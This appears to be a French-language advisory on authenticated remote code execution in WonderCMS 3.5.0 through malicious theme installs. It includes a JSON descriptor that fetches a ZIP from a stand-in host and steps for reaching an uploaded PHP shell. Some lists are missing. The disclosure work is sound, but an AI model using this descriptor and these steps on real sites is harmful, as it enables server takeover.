
Exploit RCE authentifié pour WonderCMS 3.5.0 via l'installation de thème malveillant. Inclut les mécanismes de vulnérabilité, le PoC et des conseils d'atténuation pour les tests de sécurité et l'éducation.
Une vulnérabilité d'exécution de code à distance (RCE) authentifiée existe dans WonderCMS v3.5.0.
Le problème provient de la façon dont l'application gère les installations de thèmes/modules distants via des descripteurs JSON. Lorsqu'un administrateur soumet un fichier JSON distant faisant référence à une archive ZIP, son contenu est extrait dans un répertoire accessible via le web (par exemple, /themes/). Si le ZIP contient un fichier PHP, ce fichier devient accessible sur le web et peut être exécuté.
Ce comportement introduit un risque de RCE en raison :
Remarque : L'authentification administrateur est requise, mais les installations par défaut exposent le mot de passe administrateur publiquement (sur la page d'accueil), utilisent une connexion par mot de passe uniquement et n'imposent pas de contrôles d'authentification forts.
WonderCMS acceptera et tentera d'installer des modules/thèmes distants si le descripteur JSON soumis correspond au format attendu . Un descripteur qui réussit la vérification de format (et pointe vers une archive ZIP) sera récupéré et son contenu sera extrait dans un répertoire accessible via le web (par exemple, ) sans autre validation des types de fichiers.
wcms-modules.json/themes/<nom>/Exemple de descripteur :
{
"themes": {
"SSRF": {
"name": "FAKE",
"repo": "https://example.com/",
"zip": "https://example.com/evil.zip",
"summary": "test",
"version": "1.0.0",
"image": "https://example.com/fake.png"
}
}
}
Avertissement : Ne pas exécuter sur des systèmes de production. Utiliser uniquement des environnements de test autorisés.
Obtenez le mot de passe administrateur depuis la page d'accueil publiquement exposée d'une installation WonderCMS par défaut.
Connectez-vous au panneau d'administration.
Accédez à la section d'installation des thèmes.
Fournissez l'URL d'un descripteur JSON malveillant (par exemple, hébergé sur un serveur contrôlé par l'attaquant).
Lancez l'installation. Le serveur effectuera les actions suivantes :
Installez le thème malveillant téléchargé.
Accédez au shell PHP extrait (par exemple, http://cible.com/themes/<Nom_du_Thème>/shell.php) pour exécuter des commandes arbitraires.
(Remarque : Effectuez ces étapes uniquement dans un environnement de test contrôlé. L'exploitation de cette vulnérabilité sur des systèmes en production sans autorisation est illégale.)
La vulnérabilité a été signalée aux mainteneurs de WonderCMS en juillet 2025.
Les mainteneurs ont reconnu le signalement mais ont noté que, selon eux, ce comportement est acceptable pour les administrateurs.
Pour réduire l'exposition :
themes/ ou plugins/ via la configuration du serveur.Ces informations sont fournies à des fins de recherche défensive en sécurité et à des fins éducatives. Obtenez toujours une autorisation appropriée avant de tester ou de divulguer des vulnérabilités.